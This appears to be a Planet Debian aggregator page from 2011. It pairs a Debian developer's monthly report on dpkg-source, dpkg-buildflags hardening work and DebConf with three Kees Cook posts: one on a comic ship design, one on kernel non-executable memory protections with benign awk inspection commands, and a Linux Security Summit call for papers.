This is my monthly summary of my Debian related activities. If you re among the people who made a donation to support my work (170 , thanks everybody!), then you can learn how I spent your money. Otherwise it s just an interesting status update on my various projects. This month passed by very quickly since I attended both the Libre Software Meeting / RMLL and the DebConf. Libre Software Meeting / RMLL I attended only 3 days out of the 6 but that was a deliberate choice since I was also attending DebConf for a full week later in the month. During those 3 days I helped with the Debian booth that was already well taken care of by Fr d ric Perrenot and Arnaud Gambonnet. Unfortunately we did not have any goodies to sell. We (as in Debian France) should do better in this regard next time. One of the talks I attended presented EnVenteLibre. This website started as an online shop for two French associations (Ubuntu-fr, Framasoft). They externalize all the logistic to a company and only have to care about ordering goodies and delivering to the warehouse of the logistic company. They can also take some goodies from the warehouse and ship them for a conference, etc. We discussed a bit to see how Debian France could join, they are even ready to study what can be done to operate at the international level (that would be interesting for Debian with all the local associations that we have throughout the world). Back to the LSM, while I had 3 good days in Strasbourg, it seems to mee that the event is slowly fading out it s far from being an international event and the number of talks doesn t make for a better quality. BTW, do you remember that Debconf 0 and Debconf 1 were associated to this event while it was in Bordeaux? dpkg-source improvements During my time in Strasbourg (and in particular the travel to go there and back!) I implemented some changes to 3.0 (quilt) source format. It will now fail to build the source package if there are upstream changes that are not properly recorded in a quilt patch:
dpkg-source: info: local changes detected, the modified files are:
 2ping-1.1/README
dpkg-source: info: you can integrate the local changes with dpkg-source --commit
dpkg-source: error: aborting due to unexpected upstream changes, see /tmp/2ping_1.1-1.diff.cki8YB
As the error message hints, there s a new --commit command supported by dpkg-source that will generate the required quilt patch to fix this. In the processe you will have to submit a name and edit the patch header (pre-formatted with DEP3 compatible fields). You can get back the old behavior with the --auto-commit option. Build flags changes Ever since we adopted the Ubuntu changes to let dpkg-buildpackage set some build related environment variables (see #465282), many Debian people expressed their concerns with this approach both because it broke some packages and because those variables are not set if you execute debian/rules directly. In the end, the change was not quickly reverted and we fixed the package that this change broke. Despite this we later decided that the correct approach to inject build flags would be a new interface: dpkg-buildflags. Before changing dpkg-buildpackage to no longer set the compilation flags, I wanted to ensure dpkg-buildflags had some decent coverage in the archive (to avoid breaking too many packages again). My criteria was that CDBS and dh (of debhelper) should be using it. With the recent debhelper change (see #544844) this has been reached so I changed dpkg-buildpackage accordingly. Makefile snippets provided by dpkg At the same time, I also wanted an easy way for maintainers not using dh or CDBS to be able to fix their package easily and go back to injecting the compilation flags in the environment but doing it from the rules files. Starting with the next version of dpkg, this will be possible with something like this:
DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/default.mk
Without DPKG_EXPORT_BUILDFLAGS the variables are not exported in the environment and have no effect unless you use them somewhere. More than build flags, this will also provide a bunch of other variables that can be useful in a rules files: all the variables provided by dpkg-architecture, vendor related variables/macro and some basic package information (mainly version related). dpkg-buildflags improvements Given the renewed importance that dpkg-buildflags will take now that dpkg-buildpackage no longer sets the corresponding environment variables, I thought that I could give it some love by fixing all the open issues and implementing some suggestions I got. I also had a chat with a few members of the technical committee to discuss how hardening build flags could be enabled in Debian and this also resulted in a few ideas of improvements. In the end, here are the main changes implemented: Will all those changes, the complete set of compilation flags can be returned by dpkg-buildflags (before it would only return the default flags and it was expected that the Debian packaging would add whatever else is required afterwards). Now the maintainer just has to use the new environment variables to ensure the returned values correspond to what the package needs. DebConf: rolling and hardening build flags I spent a full week in DebConf (from Sunday 24th to Sunday 31th) and as usual, it s been a pleasure to meet again all my Debian friends. It s always difficult to find a good balance between attending talks, working in the hacklab and socializing but I m pretty happy with the result. I did not have any goal when I arrived, except managing the Rolling Bof (slides and video here) but all the discussions during talks always lead to a growing TODO list. This year was no exception. The technical committee BoF resulted in some discussions of some of the pending issues, in particular one that interests me: how to enable hardening build flags in Debian (see #552688). We scheduled another discussion on the topic for Tuesday and the outcome is that dpkg-buildflags is the proper interface to inject hardening build flags provided that it offers a mean to drop unwanted flags and a practical way to inject them in the ./configure command line. Given this I got to work and implemented those new features and worked with Kees Cook to prepare a patch that enables the hardening build flags by default. It s not ready to be merged but it s working already (see my last update in the bug log). A few words about the Rolling BoF too. The room was pretty crowded: as usual the topic generates lots of interest. My goal with the BoF was very limited, I wanted to weigh the importance of the various opinions expressed in the last gigantic discussion on debian-devel. It turns out a vast majority of attendants believe that testing is already usable. But when you ask them if we must advertise it more, answers are relatively mixed. When asked if we can sustain lots of testing/rolling users, few people feel qualified to reply but those that do tend to say yes. More dpkg work Lots of small things done: Package Tracking System and DEHS Christoph Berg recently wrote a replacement for DEHS because the latter was not really reliable and not under control of the QA team. This is a centralized system that uses the watch files to detect new upstream versions of the software available in Debian. I updated the Package Tracking System to use this new tool instead of DEHS. The new thing works well but we re still lacking the mail notifications that DEHS used to send out. If someone wants to contribute it, that would be great! Misc packaging work I did some preliminary work to update the WordPress package to the latest upstream version (3.2). I still have to test the resulting package, replacing upstream shipped copies of javascript/PHP libraries is always a risk and unfortunately all of them had some changes in the integration process. I also updated nautilus-dropbox to version 0.6.8 released upstream. I also uploaded the previous version (that was in testing at that time) to squeeze-backports. So there s now an official package in all the Debian distributions (Squeeze, Wheezy, Sid and Experimental)! Thanks See you next month for a new summary of my activities.

No comment Liked this article? Click here. My blog is Flattr-enabled.

12 July 2011

Kees Cook: aliens hat-tip

Picked up a Doctor Who comic today and saw a nice hat-tip to (or composite ship design plagiarism of) Aliens. The Colonial Marines ship Sulaco , from Aliens, 1986:
aliens ship The Scavengers ship, from the Doctor Who Spam Filtered story, 2011:
drwho art Such a great ship. Not even remotely made to look aerodynamic. And to make this almost related to Ubuntu and Debian, here was my command line to remove exif data from the image I took with my phone: mogrify -strip spam-filtered.jpg

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

27 April 2011

Kees Cook: non-executable kernel memory progress

The Linux kernel attempts to protect portions of its memory from unexpected modification (through potential future exploits) by setting areas read-only where the compiler has allowed it (CONFIG_DEBUG_RODATA). This, combined with marking function pointer tables const , reduces the number of easily writable kernel memory targets for attackers. However, modules (which are almost the bulk of kernel code) were not handled, and remained read-write, regardless of compiler markings. In 2.6.38, thanks to the efforts of many people (especially Siarhei Liakh and Matthieu Castet), CONFIG_DEBUG_SET_MODULE_RONX was created (and CONFIG_DEBUG_RODATA expanded). To visualize the effects, I patched Arjan van de Ven s arch/x86/mm/dump_pagetables.c to be a loadable module so I could look at /sys/kernel/debug/kernel_page_tables without needing to rebuild my kernel with CONFIG_X86_PTDUMP. Comparing Lucid (2.6.32), Maverick (2.6.35), and Natty (2.6.38), it s clear to see the effects of the RO/NX improvements, especially in the Modules section which has no NX markings at all before 2.6.38:
lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   grep NX   wc -l
0
maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   grep NX   wc -l
0
natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   grep NX   wc -l
76
2.6.38 s memory region is much more granular, since each module has been chopped up for the various segment permissions:
lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   wc -l
53
maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   wc -l
67
natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables   wc -l
155
For example, here s the large sunrpc module. RW is read-write, ro is read-only, x is executable, and NX is non-executable:
maverick-amd64# awk '/^'$(awk '/^sunrpc/  print $NF ' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa0096000         228K     RW             GLB x  pte
0xffffffffa0096000-0xffffffffa0098000           8K                           pte
natty-amd64# awk '/^'$(awk '/^sunrpc/  print $NF ' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa007a000         116K     ro             GLB x  pte
0xffffffffa007a000-0xffffffffa0083000          36K     ro             GLB NX pte
0xffffffffa0083000-0xffffffffa0097000          80K     RW             GLB NX pte
0xffffffffa0097000-0xffffffffa0099000           8K                           pte
The latter looks a whole lot more like a proper ELF (text segment is read-only and executable, rodata segment is read-only and non-executable, and data segment is read-write and non-executable). Just another reason to make sure you re using your CPU s NX bit (via 64bit or 32bit-PAE kernels)! (And no, PAE is not slower in any meaningful way.)

5 April 2011

Kees Cook: Linux Security Summit 2011 CFP

I m once again on the program committee for the Linux Security Summit, so I d love to see people submit talks, attend, etc. It will be held along with the Linux Plumber s Conference, on September 8th in Santa Rosa, CA, USA. I d really like to see more non-LSM developers and end-users show up for this event. We need people interested in defining threats and designing defenses. There is a lot of work to be done on all kinds of fronts and having people voice their opinions and plans can really help us prioritize the areas that need the most attention. Here s one of many archives of the announcement, along with the website. We ve got just under 2 months to get talks submitted (May 27th deadline), with speaker notification quickly after that on June 1st. Come help us make Linux more secure! :)

Next.

Previous.